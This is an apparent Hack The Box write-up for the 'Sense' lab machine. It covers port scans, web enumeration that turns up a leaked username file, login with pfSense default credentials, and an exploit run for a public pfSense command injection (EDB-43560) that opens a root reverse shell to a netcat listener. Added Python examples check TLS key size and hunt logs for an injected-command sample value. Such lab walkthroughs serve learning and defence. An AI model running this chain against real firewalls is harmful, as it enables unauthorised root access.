Sense
Network scan
root@kali:~/HTB/Machines/Sense# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.60 --rate=1000
Starting masscan 1.0.5 at 2019-11-20 15:22:09 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 443/tcp on 10.10.10.60
Discovered open port 80/tcp on 10.10.10.60
Nmap output
root@kali:~/HTB/Machines/Sense# nmap -A -T4 -v 10.10.10.60
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 10:22 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating Ping Scan at 10:22
Scanning 10.10.10.60 [4 ports]
Completed Ping Scan at 10:22, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:22
Scanning sense.htb (10.10.10.60) [1000 ports]
Discovered open port 443/tcp on 10.10.10.60
Discovered open port 80/tcp on 10.10.10.60
Completed SYN Stealth Scan at 10:22, 4.92s elapsed (1000 total ports)
Initiating Service scan at 10:22
Scanning 2 services on sense.htb (10.10.10.60)
Completed Service scan at 10:23, 14.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against sense.htb (10.10.10.60)
Retrying OS detection (try #2) against sense.htb (10.10.10.60)
Initiating Traceroute at 10:23
Completed Traceroute at 10:23, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:23
Completed Parallel DNS resolution of 2 hosts. at 10:23, 0.20s elapsed
NSE: Script scanning 10.10.10.60.
Initiating NSE at 10:23
Completed NSE at 10:23, 31.31s elapsed
Initiating NSE at 10:23
Completed NSE at 10:24, 60.05s elapsed
Initiating NSE at 10:24
Completed NSE at 10:24, 0.00s elapsed
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.044s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%), OpenBSD 4.3 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Nov 20 10:23:03 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   44.11 ms 10.10.14.1
2   44.21 ms sense.htb (10.10.10.60)

NSE: Script Post-scanning.
Initiating NSE at 10:24
Completed NSE at 10:24, 0.00s elapsed
Initiating NSE at 10:24
Completed NSE at 10:24, 0.00s elapsed
Initiating NSE at 10:24
Completed NSE at 10:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.41 seconds
           Raw packets sent: 2089 (95.600KB) | Rcvd: 189 (160.206KB)
Vulnerabilities scan
root@kali:~/HTB/Machines/Sense# nmap -p443 --script vuln 10.10.10.60
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 10:25 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.045s latency).

PORT    STATE SERVICE
443/tcp open  https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       http://www.cvedetails.com/cve/2014-0224
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_sslv2-drown:
Nmap done: 1 IP address (1 host up) scanned in 149.82 seconds
Web enumeration
Dirsearch
At first, I made the mistake of scanning port 80 instead of port 443, wasting a lot of time. The application, pfSense, is found on port 443 (port 80 redirects to port 443). The application is written in PHP.
root@kali:~/HTB/Machines/Sense# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u https://10.10.10.60
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_11-48-37.log
Target: https://10.10.10.60
SSL Error connecting to server. Try the -b flag to connect by hostname
Task Completed
Curl
When I try to fetch the page, I run into this issue.
root@kali:~# curl -v https://10.10.10.60
*   Trying 10.10.10.60:443...
* TCP_NODELAY set
* Connected to 10.10.10.60 (10.10.10.60) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: none
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (OUT), TLS alert, bad certificate (554):
* SSL certificate problem: EE certificate key too weak
* Closing connection 0
curl: (60) SSL certificate problem: EE certificate key too weak
More details here: https://curl.haxx.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
This is related to the weak TLS configuration found earlier: the server's certificate key is too small for curl's default policy. With curl we can bypass the check using the -k flag; for directory enumeration we switch from dirsearch to DirBuster.
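What curl is objecting to is the size of the server's RSA key: OpenSSL's default security level on Kali refuses end-entity RSA keys shorter than 2048 bits, in line with the 1024-bit parameters the ssl-dh-params check reported. The script below is an added example, not part of the original write-up or of pfSense: it fetches a server certificate and reports the RSA modulus length by walking the DER encoding directly, so the same check can be scripted without third-party libraries. The 2048-bit threshold, the default target and the make_test_cert helper (which builds a constructed, unsigned certificate skeleton only to exercise the parser offline) are assumptions of the example.

```python
"""Report the RSA key size of a TLS server certificate (added example).

curl's "EE certificate key too weak" is OpenSSL's security level refusing an
end-entity RSA key shorter than 2048 bits. This walks the certificate's DER
encoding by hand to find the RSA modulus. Only fetch_cert() touches the network.
"""
import socket
import ssl
import sys

MIN_RSA_BITS = 2048  # what OpenSSL security level 2 (the Debian/Kali default) demands
RSA_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1 rsaEncryption


def _read_tlv(buf, pos):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits count the length octets that follow
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Yield (tag, value) for each element directly inside a SEQUENCE value."""
    pos = 0
    while pos < len(value):
        tag, inner, pos = _read_tlv(value, pos)
        yield tag, inner


def rsa_modulus_bits(der_cert):
    """Return the RSA modulus length in bits, or None if the key is not RSA."""
    _, cert, _ = _read_tlv(der_cert, 0)   # Certificate ::= SEQUENCE { tbsCertificate, sigAlg, sig }
    _, tbs, _ = _read_tlv(cert, 0)        # first child is TBSCertificate
    fields = list(_children(tbs))
    if fields[0][0] == 0xA0:              # optional [0] EXPLICIT version comes first when present
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo
    spki_alg, spki_key = [v for _, v in _children(fields[5][1])][:2]
    alg_oid = next(v for t, v in _children(spki_alg) if t == 0x06)
    if alg_oid != RSA_OID:
        return None
    _, rsa_pub, _ = _read_tlv(spki_key[1:], 0)  # skip the BIT STRING unused-bits octet
    _, modulus = next(_children(rsa_pub))       # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    return int.from_bytes(modulus, "big").bit_length()


def key_verdict(bits):
    """Human-readable verdict matching what curl/OpenSSL decide."""
    if bits is None:
        return "non-RSA key (not assessed here)"
    return "OK" if bits >= MIN_RSA_BITS else f"too weak ({bits} < {MIN_RSA_BITS} bits)"


def fetch_cert(host, port=443):
    """Fetch the peer certificate in DER form without trusting it; we assess, not verify."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.set_ciphers("DEFAULT@SECLEVEL=0")  # otherwise OpenSSL aborts the handshake on 1024-bit DH/RSA
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True), tls.version(), tls.cipher()[0]


def _der(tag, value):
    """Minimal DER encoder, used only to build an offline test certificate."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_octets = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_octets)]) + length_octets + value


def make_test_cert(modulus_bits):
    """Constructed, unsigned certificate skeleton carrying an RSA key of the given size."""
    n = (1 << (modulus_bits - 1)) | 1                      # constructed modulus with the top bit set
    n_der = _der(0x02, b"\x00" + n.to_bytes(modulus_bits // 8, "big"))  # DER needs a sign pad byte
    e_der = _der(0x02, (65537).to_bytes(3, "big"))
    rsa_pub = _der(0x30, n_der + e_der)
    alg = _der(0x30, _der(0x06, RSA_OID) + _der(0x05, b""))
    spki = _der(0x30, alg + _der(0x03, b"\x00" + rsa_pub))
    empty = _der(0x30, b"")                                 # placeholder issuer/validity/subject
    tbs = _der(0x30, _der(0xA0, _der(0x02, b"\x02")) + _der(0x02, b"\x01")
               + alg + empty + empty + empty + spki)
    return _der(0x30, tbs + alg + _der(0x03, b"\x00"))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.60"  # default taken from the write-up
    der, version, cipher = fetch_cert(target)
    bits = rsa_modulus_bits(der)
    print(f"{target}: {version} {cipher}; RSA key {bits} bits -> {key_verdict(bits)}")
```

Run it with the host as the only argument. The SECLEVEL=0 cipher string is what lets the client complete a handshake with a server that still offers 1024-bit parameters; without it the assessment tool would fail exactly the way curl did above.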
Dirbuster
root@kali:~/HTB/Machines/Sense# cat DirBusterReport-10.10.10.60-443.txt
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed Nov 20 11:59:28 EST 2019
--------------------------------
https://10.10.10.60:443
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/tree/

Dirs found with a 302 response:

/installer/

--------------------------------
Files found during testing:

Files found with a 200 responce:

/index.php
/changelog.txt
/themes/pfsense_ng/javascript/niftyjsCode.js
/csrf/csrf-magic.js
/javascript/jquery.js
/tree/tree.js
/system-users.txt

--------------------------------
The file system-users.txt seems very interesting.
root@kali:~/HTB/Machines/Sense# curl -k https://10.10.10.60/system-users.txt
####Support ticket###

Please create the following user

username: Rohit
password: company defaults
A quick look at https://docs.netgate.com/pfsense/en/latest/usermanager/pfsense-default-username-and-password.html shows the pfSense default credentials: user admin, password pfsense.
Login into the application
We try user rohit and password pfsense.
Search exploit
root@kali:~/HTB/Machines/Sense# searchsploit pfsense
----------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------- ----------------------------------------
pfSense - 'interfaces.php?if' Cross-Site Scripting | exploits/hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site Scripting | exploits/hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross-Site Scripting | exploits/hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cross-Site Scripting | exploits/hardware/remote/35070.txt
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | exploits/unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution | exploits/php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 - Directory Traversal | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | exploits/php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/41501.txt
pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit) | exploits/php/remote/43341.rb
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting | exploits/php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scripting | exploits/multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting | exploits/php/webapps/46936.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | exploits/php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery | exploits/php/webapps/39306.html
pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery | exploits/php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross-Site Scripting | exploits/freebsd/webapps/24439.txt
----------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Exploit 43560 is the one that fits our case.
root@kali:~/HTB/Machines/Sense# searchsploit -m 43560
  Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
      URL: https://www.exploit-db.com/exploits/43560
     Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/HTB/Machines/Sense/43560.py
Open Listener
root@kali:~/HTB/Machines/Sense# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Run the exploit
root@kali:~/HTB/Machines/Sense# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.34 --lport 4444 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
Reverse shell on the listener
root@kali:~/HTB/Machines/Sense# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.60.
Ncat: Connection from 10.10.10.60:33076.
sh: can't access tty; job control turned off
# whoami
root
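From the defender's side, this chain leaves two things in the web server's access log: a successful GET of system-users.txt, a file that should never have been served, and a request to status_rrd_graph_img.php carrying shell metacharacters in a query parameter (the script named by EDB-43560). The Python below is an added example, not from the original write-up or from pfSense: it parses Common Log Format lines and raises both alerts. The sample log lines and their query parameters are constructed for the example, and an access log in this format on the firewall is an assumption.

```python
"""Hunt a CLF access log for the indicators of this attack path (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Characters that terminate or chain a shell command; none belongs in a graph parameter.
SHELL_META = re.compile(r"[;|`\n]|\$\(")

SENSITIVE_PATHS = {"/system-users.txt"}                 # served with 200 in the write-up
CMD_INJECTION_SCRIPTS = {"/status_rrd_graph_img.php"}  # script named in EDB-43560


def parse_line(line):
    """Parse one CLF line into a dict with a decoded path and parameter list, or None."""
    m = CLF.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)
    # parse_qsl undoes %xx and '+' encoding, so an encoded ';' is seen as ';'
    entry["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the alerts raised by one parsed entry (empty list when benign)."""
    alerts = []
    if entry["path"] in SENSITIVE_PATHS and entry["status"] == 200:
        alerts.append(f"sensitive file served: {entry['path']}")
    if entry["path"] in CMD_INJECTION_SCRIPTS:
        for name, value in entry["params"]:
            if SHELL_META.search(value):
                alerts.append(
                    f"shell metacharacter in {entry['path']} parameter {name!r}: {value!r}"
                )
    return alerts


def hunt(lines):
    """Run every line through the detectors; return (client, time, alert) tuples."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings.extend((entry["ip"], entry["time"], alert) for alert in classify(entry))
    return findings


# Constructed sample log: one benign page view, the sensitive-file read, a legitimate
# graph request, an injected graph request, and a metacharacter outside the scoped script.
SAMPLE_LOG = """\
10.10.14.34 - - [20/Nov/2019:11:59:02 -0500] "GET /index.php HTTP/1.1" 200 6254
10.10.14.34 - - [20/Nov/2019:12:01:17 -0500] "GET /system-users.txt HTTP/1.1" 200 106
10.10.14.34 - - [20/Nov/2019:12:05:40 -0500] "GET /status_rrd_graph_img.php?database=queues&graph=8hour HTTP/1.1" 200 4821
10.10.14.34 - - [20/Nov/2019:12:06:03 -0500] "GET /status_rrd_graph_img.php?database=queues&graph=8hour%3Bid HTTP/1.1" 200 0
10.10.14.34 - - [20/Nov/2019:12:06:09 -0500] "GET /index.php?q=a%3Bb HTTP/1.1" 200 6254
""".splitlines()

if __name__ == "__main__":
    for client, when, alert in hunt(SAMPLE_LOG):
        print(f"{when} {client} {alert}")
```

Decoding the query string before matching matters: the URL-encoded form of a semicolon never contains a literal one, so a regex over the raw request line would miss the injected request while the decoded parameter value is caught. Scoping the metacharacter rule to the vulnerable script keeps legitimate punctuation elsewhere from generating noise.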
User flag
# cd /home
# ls -l
total 8
drwxrwxr-x  2 root   operator  512 Oct 14  2017 .snap
drwxr-xr-x  2 rohit  nobody    512 Oct 14  2017 rohit
# cat rohit/user.txt
<USER_FLAG>
Root flag
# cat /root/root.txt
<ROOT_FLAG>
Daniel Simao 18:03, 21 November 2019 (EST)